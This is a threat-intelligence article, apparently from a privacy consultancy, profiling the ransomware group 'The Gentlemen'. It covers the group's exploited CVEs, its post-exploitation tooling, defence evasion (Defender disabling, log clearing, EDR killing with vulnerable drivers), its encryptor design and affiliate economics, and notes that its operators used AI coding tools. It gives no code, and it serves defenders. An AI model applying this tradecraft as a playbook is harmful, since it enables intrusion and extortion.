INTEL

The Gentlemen Ransomware: Threat Actor Profile

May 2026  ·  17 min read

Privacy Insight Solutions OSINT & Executive Privacy Analysts

The Gentlemen emerged publicly in September 2025. By the end of Q1 2026, they held the number-two position globally by published victim volume — ranking behind only Qilin, the group their operators had defected from months earlier. They reached that position in under nine months, using a combination of mass edge-device exploitation, a credential inventory drawn from infostealer logs, and a self-propagating encryptor engineered to prevent bulk decryption.

This is the fourth article in our Pattern-6 threat-actor series, which profiles high-volume criminal groups that use corporate data exposure as an attack vector, leverage mechanism, or revenue source. Previous profiles: Qilin, ShinyHunters, CoinbaseCartel.

Origins: the Qilin split

The group’s two lead operators go by the handles hastalamuerte and zeta88. Both were previously affiliates of the Qilin ransomware-as-a-service programme, operating within what Qilin internally called the ArmCorp affiliate group.

The departure was not settled quietly. On 22 July 2025, hastalamuerte filed an arbitration complaint on the RAMP underground forum against Qilin, claiming approximately $48,000 in unpaid affiliate commissions. RAMP functions as an informal dispute resolution venue for criminal ecosystem disagreements; the filing is on record. Whether the claim resolved is not publicly known.

The first Gentlemen malware sample appeared on 17 July 2025 — five days before the RAMP filing. The group opened affiliate recruitment in September 2025. By that point, they already had infrastructure in place: a leak site, an affiliate management panel, and what analysis later revealed to be a pre-built access inventory of compromised network devices.

Initial access: a pre-built access inventory

The primary initial-access vector is exploitation of CVE-2024-55591, an authentication bypass in Fortinet FortiOS and FortiProxy with a CVSS score of 9.8. The vulnerability was disclosed in January 2025; proof-of-concept code circulated quickly, and mass exploitation of unpatched edge devices followed.

What distinguishes The Gentlemen’s approach is the scale of preparation. Analysis of a seized SystemBC command-and-control server, published by Check Point Research in April 2026, found a maintained database of 14,700 compromised FortiGate devices and 969 validated brute-forced FortiGate VPN credentials. Confirmed, catalogued access points held for deployment — not scan results or leads.

That catalogue predates many of the attacks attributed to the group. One documented case involved an SFTP credential captured in 2023 and used in a 2026 intrusion. For any organisation that ran unpatched Fortinet edge devices, the relevant question is whether the device was already compromised during the window between mass exploitation and patch application — current patch status does not answer it.

The CVE portfolio has since expanded. Internal communications exposed through the group’s own breach (covered below) confirm two additional vectors in active operational use:

  • CVE-2025-32433 — a critical authentication bypass in Erlang/OTP SSH, affecting Cisco network appliances. A proof-of-concept was shared internally by an affiliate identified as “qbit” and flagged for immediate deployment.
  • CVE-2025-33073 — an NTLM relay vulnerability operationalised through a tool called RelayKing, which automates domain-wide NTLM relay reconnaissance and credential capture post-foothold.

Beyond direct CVE exploitation, the group uses infostealer credential logs as a parallel initial-access path. Leaked internal communications confirm the use of Snusbase and equivalent log-search platforms to query credential databases derived from commodity malware families including RedLine, Lumma, and Vidar. VPN credentials, Microsoft 365 accounts, Okta SSO tokens, and remote-access services without multi-factor authentication are the target categories.

The credential sourcing operates across two market tiers simultaneously: commodity infostealer logs sold in bulk for a few dollars per record, and the maintained device access inventory built through active CVE exploitation. Initial access to a target can therefore come from a credential captured years earlier by a separate criminal operation — one that has nothing to do with The Gentlemen and that the target organisation is likely unaware of.

If your organisation runs Fortinet edge devices or relies on partner-managed Atlassian or ITSM infrastructure, a Corporate Audit maps what access a group like this could already hold — and through which vector.

Talk to an Analyst

Technical execution chain

Once inside a network, the group runs a documented post-exploitation sequence. NetExec handles lateral movement and credential harvesting from domain controllers. Cobalt Strike provides interactive command-and-control, tunnelled through SystemBC — a SOCKS5 proxy implant using a custom RC4-encrypted protocol to conceal C2 traffic from network monitoring.

The pre-encryptor sequence is documented across multiple incidents. PowerShell scripts disable Windows Defender and add folder exclusions before any further tooling runs. Event logs — Security, System, and Application — are cleared as a standard post-exploitation step. EDR termination uses a bring-your-own-vulnerable-driver technique: a legitimately signed driver with a known kernel-mode vulnerability is loaded to kill endpoint detection processes before the encryptor executes, bypassing user-mode controls entirely. Drivers confirmed in use include ThrottleBlood.sys and viragt64.sys.

Browser session harvesting for Microsoft 365 and Okta SSO tokens has been confirmed in Huntress incident reports from April and May 2026, conducted post-foothold and prior to encryption — part of the data collection phase that enables extortion regardless of whether the victim accepts decryption.

Data exfiltration runs through RClone, renamed to avastrclone.exe to avoid process-name detection rules. Staging and transfer precede encryption in all documented incidents.

The encryptor itself is the most technically distinctive element. A Microsoft Security reverse-engineering analysis published on 28 May 2026 identified the following characteristics:

  • Written in Go, obfuscated using Garble — a tool that strips symbol names, randomises function signatures, and inserts dead code to frustrate static analysis
  • Per-file ephemeral key generation: Curve25519 for key exchange, XChaCha20 as the stream cipher. Each file is encrypted with a unique key derived from a per-file ephemeral key pair. Recovering one key does not decrypt others; there is no master key that, if obtained, yields bulk decryption
  • Self-propagating: lateral movement and encryptor deployment are integrated into the binary itself. The encryptor targets SMB shares, domain-joined hosts, and network storage without requiring a separate deployment tool
  • A separate C-based locker for ESXi hypervisors, confirmed as a distinct binary from the Go Windows and Linux encryptors — indicating that ESXi environments are a deliberate target, not an incidental one

Domain-wide deployment uses Group Policy Objects: a GPO-pushed scheduled task runs the encryptor with SYSTEM privileges across all domain-joined hosts simultaneously. Combined with the self-propagating mechanism in the binary, the interval between encryptor release and full domain encryption is measured in minutes in documented cases.

The Gentlemen ransomware attack chain — six phases from initial access to encryption

RaaS structure and affiliate economics

The group operates a ransomware-as-a-service programme with approximately 20 members — the two lead operators and a managed affiliate network recruited through RAMP and BreachForums. The revenue split is 90% to the affiliate, 10% to the operators. A parallel data-only extortion track — exfiltration and publication without encryption — pays affiliates 97%.

These are among the most generous terms in the current RaaS market and function as a deliberate recruitment signal. The structure mirrors how Qilin ran its affiliate programme, suggesting the operators carried institutional knowledge of what incentive terms attract capable affiliates.

Affiliates receive compiled locker binaries for Windows, Linux, and ESXi; the CVE exploitation scripts; the NetExec and BYOVD tooling package; and access to the Cobalt Strike and SystemBC C2 infrastructure. Operational guidance and CVE updates are distributed through the internal communications platform — the same one that was subsequently breached.

Internal chat logs disclosed through the Rocket breach confirm that zeta88 built the affiliate management panel in approximately three days using AI coding assistants, initially using commercially available tools before shifting to Qwen and DeepSeek. The encryptor and locker binaries were partially reverse-engineered from source code and samples of Babuk, Qilin, LockBit 5.0, and Medusa before the custom Go implementation was developed.

In May 2026, following the infrastructure breach described below, the group formalised a partnership with BreachForums. The Gentlemen’s dark web leak site now carries a BreachForums banner; the arrangement provides infrastructure support and a secondary distribution channel in exchange for the association.

Scale: what the leak site does not show

The Gentlemen’s public dark web leak site listed approximately 330–350 named victims as of late May 2026. The actual number of compromised organisations is substantially higher.

Analysis of a seized SystemBC C2 server, published by Check Point Research in April 2026, identified 1,570+ compromised organisations in the server’s records — roughly four to five times the public DLS count. The gap implies that approximately 78% of victims paid a ransom and were never published. That ratio is consistent with patterns across other high-volume RaaS operations, where the leak site functions as a coercive instrument rather than a complete record.

Check Point’s State of Ransomware Q1 2026 report ranked The Gentlemen second globally by victim volume, behind only Qilin. That ranking uses published victim counts; the adjusted figure, accounting for silent resolutions, is proportionally higher.

The geographic and sectoral spread is broad. Documented victims span Romanian state energy infrastructure, UK technology services, French municipal government, Turkish consumer electronics, Irish telecommunications infrastructure, and US professional services. No consistent sectoral targeting criterion is apparent — the model is opportunistic, driven by access availability rather than vertical selection.

The Gentlemen ransomware: published victims vs estimated total compromised organisations

Adaptavist, Arçelik, and Oltenia: three incidents in context

Adaptavist and Arçelik — the supply-chain pivot

Adaptavist is a UK-headquartered technology services firm and Atlassian Platinum Solution Partner, providing Jira, Confluence, and related tooling to enterprise clients. The company disclosed a breach in April 2026 and appeared on The Gentlemen’s leak site as a claimed victim.

The breach did not end there. The group used access established at Adaptavist to pivot into Arçelik, a Turkish consumer electronics manufacturer with approximately $11.8 billion in annual revenue, whose Atlassian environment Adaptavist managed or supported. Arçelik appeared as a separate claimed victim.

The breach entry point was the service provider, not the target organisation — the partner-tier supply-chain route. Arçelik’s Atlassian environment was reachable because the credentials and access required to manage it resided at Adaptavist. That relationship — partner credentials with client-environment access — rarely appears in client-side attack surface assessments, which enumerate the organisation’s own infrastructure rather than the infrastructure of firms that hold keys into it.

Complexul Energetic Oltenia

On 26 December 2025, The Gentlemen claimed Complexul Energetic Oltenia, a Romanian state-owned coal and electricity generation operator. The incident was independently reported by Romanian media and confirmed as a ransomware event affecting operational systems. Oltenia operates within Romania’s regulated energy infrastructure.

The Rocket breach: internal exposure and aftermath

In early May 2026, the group’s internal communications platform — a Rocket.Chat deployment used as the affiliate management and negotiation backend — was compromised by an external party. The dataset was reportedly sold for $10,000 before being released without charge on MediaFire on 8 May 2026. The released material included approximately 8,200 lines of internal chat logs across a dataset totalling roughly 16 GB.

Check Point Research published an analysis under the title “Thus Spoke The Gentlemen”; KELA Cyber and Group-IB published parallel assessments. The disclosed material included:

  • Operator handles: in addition to hastalamuerte and zeta88, active internal handles included 3NT3R, B1d3n, C0CA, d0wnloAd1, equal1z3r, F3N1X, Gblog88, LDW, n0n3, PRTGRS, and W1Z
  • Negotiation transcript: one disclosed exchange shows an anchor demand of $250,000, settled at $190,000. The structure follows demand-letter convention — anchoring high, conceding to a figure that was the effective floor
  • Payment routing: references to Tinkoff Bank and AML layering services suggest a Russia-adjacent payment infrastructure. Activity timestamps are consistent with Moscow business hours
  • CVE tracking: internal discussion of CVE-2025-32433 and CVE-2025-33073 confirms these as live operational priorities at the time of the breach, not theoretical additions to the toolkit
  • Development tooling: zeta88’s chat logs confirm the affiliate panel was built in approximately three days using AI coding assistants, with a later shift from Western commercial tools to Qwen and DeepSeek

Check Point stated that their findings were shared with law enforcement. No public enforcement action has been confirmed as of late May 2026.

The group’s response was dismissive. They announced a full infrastructure overhaul within days: new NAS storage with no stated capacity ceiling, a rebuilt internal communication architecture, and technical additions to the encryptor — specifically NTDLL unhooking, Event Tracing for Windows (ETW) patching to suppress telemetry reporting, and hardware breakpoint removal. They continued posting victims throughout the period. The breach did not interrupt operations.

The Rocket incident produced a volume of primary-source intelligence on an active RaaS operation that is uncommon. It also demonstrated that the group’s operational continuity does not depend on secrecy about their infrastructure. They were exposed, analysed, and became technically harder to detect as a result.

ATT&CK technique reference

The following technique IDs reflect documented behaviour confirmed across vendor incident reports and the Check Point analysis of the Rocket breach materials. They do not include inferred or theoretical capabilities.

  • T1190 — Exploit Public-Facing Application: CVE-2024-55591 (FortiOS/FortiProxy), CVE-2025-32433 (Erlang/OTP SSH on Cisco appliances)
  • T1078 — Valid Accounts: VPN credentials from brute-force campaigns and infostealer log markets; Snusbase confirmed as a sourcing platform
  • T1557.001 — NTLM Relay: CVE-2025-33073, operationalised via RelayKing for domain-wide reconnaissance
  • T1059.001 — PowerShell: Defender disable, folder exclusions, pre-execution environment preparation
  • T1562.001 — Impair Defenses: BYOVD kernel-mode EDR termination (ThrottleBlood.sys, viragt64.sys)
  • T1543.003 — Create or Modify System Process / Windows Service: GPO-deployed scheduled tasks for simultaneous domain-wide encryptor execution with SYSTEM privileges
  • T1021 — Remote Services: NetExec for lateral movement across domain-joined hosts
  • T1090 — Proxy: SystemBC SOCKS5 tunnelling with custom RC4-encrypted C2 protocol
  • T1048 / T1567 — Exfiltration: RClone renamed as avastrclone.exe for data staging and transfer prior to encryption
  • T1486 — Data Encrypted for Impact: Go encryptor with Garble obfuscation and per-file ephemeral Curve25519+XChaCha20 key pairs
  • T1490 — Inhibit System Recovery: vssadmin.exe shadow copy deletion
  • T1070.001 — Clear Windows Event Logs: Security, System, and Application logs cleared post-exploitation as a standard step

Corporate exposure implications

The pre-built access inventory is the first dimension worth mapping. A catalogue of 14,700 compromised FortiGate devices means that for some organisations, the question is not whether they are currently vulnerable — it is whether their devices were in that catalogue before a patch was applied. Exposure assessments that map external network edge infrastructure against the CVE-2024-55591 exploitation timeline can indicate whether a credential is likely already in circulation, regardless of current patch status.

The credential surface runs parallel. The group’s use of Snusbase and commodity infostealer logs places VPN, M365, and remote-access credentials held in stealer-log markets in direct line of use as initial-access material. This is the same surface mapped in the Qilin, ShinyHunters, and CoinbaseCartel profiles — different groups, same acquisition path. An organisation’s credential exposure in those markets is auditable.

The supply-chain access layer is harder to see from the client side. The Adaptavist incident illustrates that managed Atlassian environments, ITSM tooling, and similar partner-adjacent infrastructure inherit the access risk of the service provider. That risk does not appear in standard attack surface management scans, which enumerate an organisation’s own infrastructure rather than the access privileges held by firms that manage it. For a deeper treatment of this gap, see Third-Party Risk vs Supply Chain Attack.

Sources

Primary analysis and encryptor research

  • Microsoft Security Blog, “The Gentlemen Ransomware: Dissecting a Self-Propagating Go Encryptor,” 28 May 2026
  • Check Point Research, “Thus Spoke The Gentlemen,” May 2026
  • Check Point Research, “When the Ransomware Gang Gets Hacked,” May 2026
  • Check Point Research, DFIR Report: The Gentlemen and SystemBC, April 2026
  • Check Point Research, “The State of Ransomware Q1 2026,” 2026
  • Group-IB, “Hasta la vista, Hastalamuerte: An Overview of The Gentlemen’s TTPs,” 19 March 2026
  • KELA Cyber, “Inside The Gentlemen Leak: Internal Chat Analysis,” May 2026
  • Huntress, “The Gentlemen Ransomware: Defense Evasion TTPs Uncovered,” April–May 2026
  • Halcyon, “Threat Assessment: The Gentlemen Ransomware Group,” May 2026
  • SOCRadar, “Inside The Gentlemen Ransomware Leak,” May 2026

Incident reporting

  • BleepingComputer / SecurityAffairs — Complexul Energetic Oltenia incident, December 2025–January 2026
  • Adaptavist disclosure statement, April 2026
  • ransomware.live — victim tracking data

Vulnerability references

  • National Vulnerability Database — CVE-2024-55591, CVE-2025-32433, CVE-2025-33073
  • MITRE ATT&CK Enterprise Matrix — technique reference IDs

If this is your situation

If this kind of exposure affects your organisation, a Corporate Audit maps the full surface.

See Corporate Audit

Share this briefing

If this was useful, sharing it helps others protect themselves. It also helps keep the intelligence briefings free.